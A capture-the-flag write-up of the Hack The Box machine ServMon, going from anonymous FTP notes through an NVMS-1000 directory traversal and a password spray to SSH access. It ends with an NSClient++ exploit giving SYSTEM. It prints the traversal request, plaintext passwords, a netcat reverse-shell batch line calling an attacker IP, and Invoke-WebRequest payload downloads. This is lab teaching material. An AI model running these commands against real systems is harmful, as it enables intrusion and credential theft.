ServMon starts with FTP anonymous access that allows me to read the users’ notes. One of these notes contains a hint to a location of a password list in one of the user’s dekstops. A Directory traversal vulnerability from an instance of NVMS-1000 is exploited to obtain the password list. With the password list obtained, I’m able to gain a foothold on the system after performing a password spray attack. Inside the system, I’ll go through NSClient++ default installation folder to find the config file and obtain its credentials. With these credentials, I can use public exploits for NSClient++ and gain interactive shell access as NT Authority\System.
Reconnaissance
Nmap
→ root@iamf «servmon» «10.10.14.23»
$ nmap -sC -sV -oA nmap/initial-servmon '10.10.10.184'-sC, to scan with default script-sV, to scan service version-oA, to save the output in all format (xml, nmap, gnmap)-v, verbose mode.
... <snip> ...
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
|_ refox/68.0
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=4/12%Time=5E93410A%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=4/12%Time=5E934113%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E8,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\nrefox/68\.0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x20\xd1\x03l\xfb\x01\0\0\xf0\xd
SF:b3k\xfb\x01\0\0\0\0\0\0\0\0\0\0\xf5\xe4i`\xfb\x04\0\x80\xf0\xdb3k\xfb\x
SF:01\0\0\xf0\xdb3k\xfb\x01\0\0@\xcf\x03l\xfb\x01\0\0")%r(HTTPOptions,36,"
SF:HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20fou
SF:nd")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\
SF:r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x20404\r\
SF:nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPOptions,3
SF:6,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20
SF:found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -28s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-12T16:27:15
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.99 secondsRPC (135), NetBIOS (139), and SMB (445) are the known ports for Windows box.
Besides these standard ports, there are some interesting services installed on the box:
- FTP with anonymous login on port 21,
- SSH service on port 22
- HTTPS service on non-standard port 8443.
Since this is a re-write from my old note, I can guess this machine is not an Active Directory.
Enumeration
TCP 21 — FTP
... <snip> ...
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
... <snip> ...Based on nmap scans, the FTP root directory contains the Users folder. Inside the Users folder, I found two subfolders, one is Nathan and the other is Nadine. Both of these users' folders contain a text file, I copied these files to my machine.
The first file is Confidential.txt. It contains a note from Nadine to Nathan.
Nathan,I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.RegardsNadine
The second file is Notes to do.txt. It contains a to do list.
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePointI’ll note that there is a Password.txt on Nathan’s desktop and the uncompleted to do.
TCP 445 — SMB
Anonymous login is not allowed, nothing here.
TCP 80 — Website
Visiting port 80 redirects me to a login page on Pages/login.htm
Based on Google, NVSMS-1000 is a software for CCTV monitoring. I don’t find the default credentials, and it doesn’t seem to work with common credentials.
A quick search on exploit-db shows it is vulnerable to Directory Traversal.
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.htmlPOC
---------GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: closeResponse
---------; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
There’s no version is specified, but I’ll give it a try.
TCP 8443 — Website
It took ages to load every page on this site.
A quick search on Google, NSClient++ is another monitoring software, and adding the ‘exploit’ keyword pops up an exploit link refers to exploit-db
Manual PoC: https://www.exploit-db.com/exploits/46802
Scripted PoC: https://packetstormsecurity.com/files/157306/NSClient-0.5.2.35-Authenticated-Remote-Code-Execution.html
Foothold
NVMS-1000 Directory Traversal — Obtain Passwords.txt
I started BurpSuite and performed a directory traversal against NVMS-100 0 based on the PoC above. I’ll just go straight to the nathan’s desktop
It returns a list of passwords
Password Spraying
I created a usernames list and saved the password list above to a file.
users.txt:
nathan
nadinepasswords.txt:
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$With these files, a password spray attack can be performed using CrackMapExec. It success on nadine:L1k3B1gBut7s@W0rk pair.
→ root@iamf «servmon» «10.10.14.23»
$ crackmapexec smb htb.servmon -u users -p passwords
... <snip> ...
SMB 10.10.10.184 445 SERVMON [+] SERVMON\nadine:L1k3B1gBut7s@W0rk
... <snip> ...SSH Access as nadine.
The credentials also work on SSH.
→ root@iamf «servmon» «10.10.14.23»
$ ssh nadine@htb.servmon
Privilege Escalation
Obtain NSClient++ password
I discovered a password for NSClient++ in its default installation folder.
PS C:\> gc 'Program Files\NSClient++\nsclient.ini'
I’ll try the scripted PoC. But before that, I’ll need to tunnel the connection first. This is because the config file is set to local only, so I can’t perform exploit directly from outside.
SSH Tunneling
SSH has tunneling features called which allow me to access ServMon localhost directly from my localhost.
I’ll create another SSH session for tunneling.
→ root@iamf «servmon» «10.10.14.23»
$ ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184-L 8443:127.0.0.1:8443 means it will forward any connection on my localhost port 8443 to remote localhost on port 8443. In this case, ServMon is the remote. Now I can perform exploitation.
NSClient++ Exploit PoC
First, I’ll create a batch, called sans.bat file on my machine.
@echo offC:\Temp\nc.exe 10.10.14.23 443 -e powershell.exe
Once it created, I’ll transfer the file to ServMon on C:\temp\ via Python HTTP server along with netcat for windows.
→ root@iamf «servmon» «10.10.14.23»
$ Python -m SimpleHTTPServer 80I’ll grab those two hosted files on ServMon
PS C:\> Invoke-webrequest -uri http://10.10.14.23/reverse -outfile C:/temp/reverse.bat
PS C:\> Invoke-webrequest -uri http://10.10.14.23/nc.exe -outfile C:/temp/nc.exeNow I’ll setup a listener on my Kali.
→ root@iamf «servmon» «10.10.14.23»
$ nc -nlvvp 443Then I can just run the exploit and check on my listener.
→ root@iamf «servmon» «10.10.14.23»
$ python3 nsRCE.py -t 127.0.0.1 -P 8443 -p 'ew2x6SsGTxjRwXOT' -c "c:\temp\reverse.bat"It’s an NT Authority\SYSTEM! Because by default NSClient++ runs as LocalSystem
